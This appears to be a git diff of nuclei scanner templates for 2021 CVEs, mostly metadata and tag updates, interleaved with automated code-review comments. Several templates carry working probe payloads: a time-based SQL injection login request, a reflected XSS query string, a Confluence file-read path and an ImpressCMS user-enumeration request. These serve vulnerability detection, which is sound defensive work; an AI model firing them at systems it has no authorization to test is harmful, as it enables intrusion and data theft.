vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25298 cwe-id: CWE-78 - epss-score: 0.97378 - epss-percentile: 0.99892 + epss-score: 0.97349 + epss-percentile: 0.9988 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true 
@@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev + tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios http: - raw: @@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a00473045022100c9d1c8b75d63d81daf696f5502efaa894f86a52b4fffde35dd51a75d9de943800220594ae60f511c619a7f202902d9b20dc91cd7cb2de2b08a90e4d7425cee7cf8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25299.yaml b/nuclei-templates/CVE-2021/CVE-2021-25299.yaml index 4f0a766980..13c30457a9 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25299.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25299.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25299 cwe-id: CWE-79 epss-score: 0.96845 - epss-percentile: 0.99613 + epss-percentile: 0.99634 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: cve,cve2021,nagios,nagiosxi,xss,authenticated + tags: cve2021,cve,nagios,nagiosxi,xss,authenticated http: - raw: @@ -61,4 +61,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body -# digest: 4a0a00473045022100b20343945a347258d41c3fd412a5ce974334346d1a86db1c856c37149a3c20910220118a21f833923794d2f0c08e420c1d5645f47870dd2aa06476772b0fe599b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25899.yaml b/nuclei-templates/CVE-2021/CVE-2021-25899.yaml index bfdaab1976..1042351d65 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25899.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25899.yaml 
@@ -5,34 +5,47 @@ info: author: edoardottt severity: high description: | - An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1. + Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 + epss-score: 0.50721 + epss-percentile: 0.9747 + cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: void + product: aurall_rec_monitor shodan-query: html:"AURALL" - tags: cve,cve2021,sqli,void,aurall + tags: cve2021,cve,sqli,void,aurall -requests: +http: - raw: - | + @timeout: 15s POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test + 
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and +# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml index 9e43030b97..f2032f23ff 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml @@ -7,24 +7,25 @@ info: reference: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - tags: cve,cve2021,confluence,atlassian,lfi + - https://jira.atlassian.com/browse/CONFSERVER-67893 + - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-26085 cwe-id: CWE-862 - + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2021,confluence,atlassian,lfi,kev requests: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/nuclei-templates/CVE-2021/cve-2021-26086.yaml b/nuclei-templates/CVE-2021/CVE-2021-26086.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26086.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26086.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-26292.yaml b/nuclei-templates/CVE-2021/CVE-2021-26292.yaml index 40733d25ae..5ecd600175 100644 
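Review bot: The rewritten `description` calls the product "Void Aural Rec Monitor", while the unchanged request path `/AurallRECMonitor/`, the new `cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:...`, `product: aurall_rec_monitor`, the `shodan-query: html:"AURALL"` and the `aurall` tag all spell it "Aurall". If the "Aural" wording is kept on purpose to mirror the advisory text, a parenthetical such as `Void Aural (AURALL) Rec Monitor 9.0.0.1` would stop the two spellings reading as different products. Raising the sleep to 7s together with the new `@timeout: 15s` leaves enough headroom, but the matcher still rests on a single timing sample, so a loaded host can satisfy `duration>=7` on its own.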
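Review bot: The new `reference` entry `http://packetstormsecurity.com/files/164401/...` duplicates the `https://` entry that is already the first item of the list, so the added line should be dropped. With indentation lost in this view I cannot tell whether the new `tags:` line sits under `metadata:` or at `info` level; if it was indented under `metadata`, nuclei will not read it as the template's tag list, so this is worth checking in the committed file. This template also stays on the legacy `requests:` key while the other templates in this commit migrate to `http:`, and it receives no `max-request` or `# digest:` footer, unlike its siblings.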
--- a/nuclei-templates/CVE-2021/CVE-2021-26292.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26292.yaml @@ -12,12 +12,12 @@ info: classification: cve-id: CVE-2021-26292 metadata: - max-request: 1 verified: true - fofa-query: "X-Server: AfterlogicDAVServer" + max-request: 1 vendor: AfterLogic product: AfterLogic Aurora & WebMail - tags: cve,cve2021,afterlogic,path,disclosure + fofa-query: "X-Server: AfterlogicDAVServer" + tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic http: - raw: @@ -43,4 +43,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022060e039513b9863e1f87a2678e2005e83a77432d409bd3249dac7eab0de586e01022100b70fc76adcc36e8836210ea3b1da82e12a334c2463f8955d5ec9905247dd49ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26294.yaml b/nuclei-templates/CVE-2021/CVE-2021-26294.yaml index acdb763c22..e67e96c9ce 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26294.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26294.yaml 
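Review bot: This hunk keeps `vendor: AfterLogic` and `product: AfterLogic Aurora & WebMail` (mixed case, spaces, ampersand) and appends the mixed-case tag `AfterLogic` next to the existing `afterlogic`, while the CVE-2021-26294 hunk below normalizes the same vendor/product to the CPE-style `afterlogic` / `aurora` and likewise appends `AfterLogic`. Suggest aligning this file with 26294 (`vendor: afterlogic`, `product: aurora`) and dropping the `AfterLogic` tag in both, since it differs from `afterlogic` only by case; whether nuclei compares tags case-insensitively is not visible here, but a near-duplicate tag is noise either way.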
@@ -9,19 +9,24 @@ info: reference: - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md - https://nvd.nist.gov/vuln/detail/CVE-2021-26294 + - https://github.com/Threekiii/Awesome-POC + - https://github.com/soosmile/POC + - https://github.com/tzwlhack/Vulnerability classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-26294 cwe-id: CWE-22 + epss-score: 0.25543 + epss-percentile: 0.96591 cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: afterlogic + product: aurora fofa-query: "X-Server: AfterlogicDAVServer" - vendor: AfterLogic - product: AfterLogic Aurora & WebMail - tags: cve,cve2021,afterlogic,exposure + tags: cve2021,cve,afterlogic,exposure,AfterLogic http: - raw: @@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220694ea7d2834dba154d0d9f06f8ad15eaf474c107c11c10f1ca470b90ccaf2605022039194e44efc258f702a4397af3625ca7057d8f0810c46edd550e80e32a2c0e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/CVE-2021-26598.yaml deleted file mode 100644 index 2822629060..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml +++ /dev/null 
@@ -1,57 +0,0 @@ -id: CVE-2021-26598 - -info: - name: ImpressCMS - Incorrect Authorization - author: gy741,pdteam - severity: medium - description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). - reference: - - https://hackerone.com/reports/1081137 - - http://karmainsecurity.com/KIS-2022-03 - - https://github.com/ImpressCMS - - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 - metadata: - shodan-query: http.html:"ImpressCMS" - tags: cve,cve2021,impresscms,unauth,cms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2021-26598 - cwe-id: CWE-287 - -requests: - - raw: - - | - GET /misc.php?action=showpopups&type=friend HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - - | - GET /include/findusers.php?token={{token}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - 'last_login' - - 'user_regdate' - - 'uname' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - internal: true - group: 1 - regex: - - "REQUEST' value='(.*?)'" - - 'REQUEST" value="(.*?)"' diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml new file mode 100644 index 0000000000..67a641543d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2021-26702 +info: + name: EPrints 3.4.2 XSS + author: ritikchaddha + severity: medium + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI. + reference: + - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + - https://files.eprints.org/2548/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26702 + cwe-id: CWE-79 + tags: cve,cve2021,xss,eprints +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26754.yaml b/nuclei-templates/CVE-2021/CVE-2021-26754.yaml index 2cbc6e90a0..e46b168f1d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26754.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26754.yaml 
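Review bot: As rendered here the first matcher of the new CVE-2021-26702 template is `words: - ""`, an empty string, which matches every response body; ANDed with the 200 and `text/html` matchers that would flag any HTML page on an EPrints host. If the committed file actually contains the reflected marker and it was only stripped by this page's rendering, this is a non-issue, but the file should be checked. The template also uses the legacy `requests:` key, has no `metadata` block (`max-request`, `vendor`, `product`) and no `# digest:` footer, unlike the other templates in this commit, and its references omit the NVD entry.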
@@ -1,31 +1,46 @@ id: CVE-2021-26754 info: - name: wpDataTables < 3.4.1 - Unauthenticated SQL Injection - author: akincibor - severity: critical - description: In the default configuration, a simple table can be published in a page that does not require authentication. The table can be searched, and is vulnerable to SQL Injection via the order parameter. An unauthenticated user visiting the page where the table is published can perform a SQL injection attack in the table search parameter order[0][dir]. + name: > + wpDataTables (Premium) <= 3.4 - SQL Injection + author: topscoder + severity: high + description: > + wpDataTables before 3.4.1 mishandles order direction for server-side tables, aka admin-ajax.php?action=get_wdtable order[0][dir] SQL injection. Please note that this only affects the premium version of the plugin which shares the same slug as the free version. reference: - - https://wpscan.com/vulnerability/bfd0cfd9-0d6a-47bb-9d73-762ddc138129 - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/775e9f94-b66d-4c22-81ef-c335c0654f08?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-26754 + metadata: + fofa-query: "wp-content/plugins/wpdatatables/" + google-query: inurl:"/wp-content/plugins/wpdatatables/" + shodan-query: 'vuln:CVE-2021-26754' + tags: cve,wordpress,wp-plugin,wpdatatables,high -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/wpdatatables/readme.txt' + - "{{BaseURL}}/wp-content/plugins/wpdatatables/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: 
@@ -35,9 +50,9 @@ requests: - type: word words: - - "wpDataTables" + - "wpdatatables" part: body - type: dsl dsl: - - compare_versions(version, '< 3.4.1') \ No newline at end of file + - compare_versions(version, '<= 3.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27124.yaml b/nuclei-templates/CVE-2021/CVE-2021-27124.yaml index 56f0a8b5a3..3818af28ba 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27124.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27124.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.02262 - epss-percentile: 0.884 + epss-score: 0.01251 + epss-percentile: 0.85241 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: @@ -53,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206b581dfd4ded0340b7bfd8323a4f5fca50077b0371058bf41438a0b2b955dc0b022100cbbc6dd8bbd6ec99bd6a0420f342fc8ab8b33ea1547fa6606e7a960794be925c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
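Review bot: The version matcher in the second hunk becomes `compare_versions(version, '<= 3.4')` while the new `description` in the first hunk still says the flaw is in wpDataTables "before 3.4.1", so a 3.4.x release between 3.4 and 3.4.1, if one exists, would be reported as safe; `compare_versions(version, '< 3.4.1')` states exactly the bound the description gives. In the first hunk the second extractor gains `name: version`, giving two extractors the same name where only the first is `internal: true`; I would expect this to be harmless, but a run confirming the internal value still feeds the DSL matcher is cheap. The new `tags` line drops `cve2021` and `sqli` and adds `high`, which no other template in this commit uses as a tag; the siblings use `cve2021,cve,...` ordering.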
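Review bot: `verified: "true"` in the second hunk of CVE-2021-27124 is a quoted string, whereas the sibling templates in this commit (CVE-2021-27314, 27315, 27316 and 27319 below) use the bare boolean `verified: true`, and the CVE-2021-25114 hunk earlier in this commit explicitly converts `"true"` to `true`. Suggest `verified: true` here as well so the field has one type across the set.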
diff --git a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml b/nuclei-templates/CVE-2021/CVE-2021-27309.yaml deleted file mode 100644 index ddfc1caa7d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-27309 - -info: - name: Clansphere CMS 2011.4 - Cross-Site Scripting - author: edoardottt - severity: medium - description: | - Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. - reference: - - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27309 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2021,clansphere,xss,cms,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '">.php' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-27310.yaml b/nuclei-templates/CVE-2021/CVE-2021-27310.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27310.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27310.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27314.yaml b/nuclei-templates/CVE-2021/CVE-2021-27314.yaml index 7915d433f3..597ac7088b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27314.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27314.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27314 cwe-id: CWE-89 - epss-score: 0.38106 - epss-percentile: 0.96853 + epss-score: 0.25703 + epss-percentile: 0.96281 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Doctor Appoinment System")' condition: and - -# digest: 490a004630440220035a04a1475b1692c3fe4c175eb9210bb0ed25e840c3d671a45c91fc2471481302201ba34abef24809bd6d2f2937a771cb79ce49bb7e0696a09df8ad924bc2471d3c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27315.yaml b/nuclei-templates/CVE-2021/CVE-2021-27315.yaml index 9dad2b336d..257541a2b4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27315.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27315.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27315 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.06768 + epss-percentile: 0.93718 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a00473045022033c2dbcc836294dc1e6c8680f53361c68b4022cf6e8b9f9714d2a2a758123910022100fcabc71256976d9d6586028b190a396e68e486877b8d2c6796407d4eaca6b8a8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27316.yaml b/nuclei-templates/CVE-2021/CVE-2021-27316.yaml index 4ade099a34..f88a3dea84 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27316.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27316.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27316 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.06768 + epss-percentile: 0.93718 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 490a0046304402207033afd0b5aeb491d2eb07f98a768fba8ae0bd2bc343b43a2fb980495202965902201757a2648224288b56f6ede000c41fd0016784c8e491fa0bfda8ae1af8745164:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27319.yaml b/nuclei-templates/CVE-2021/CVE-2021-27319.yaml index 7dde3839a8..79a39b0365 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27319.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27319.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27319 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.08052 + epss-percentile: 0.9371 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a00473045022100e19ff3d17768eda25c1e2837599266d50a0827bfdeceec6a1b5b4ea089b724420220183dc45fadef939c470b4c4eb258a80a2d362bc3ed6e2cc339ab5d14e4094156:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27320.yaml b/nuclei-templates/CVE-2021/CVE-2021-27320.yaml index a2260a1e8f..260320a154 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27320.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27320.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27320 cwe-id: CWE-89 - epss-score: 0.095 - epss-percentile: 0.94147 + epss-score: 0.09267 + epss-percentile: 0.94102 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 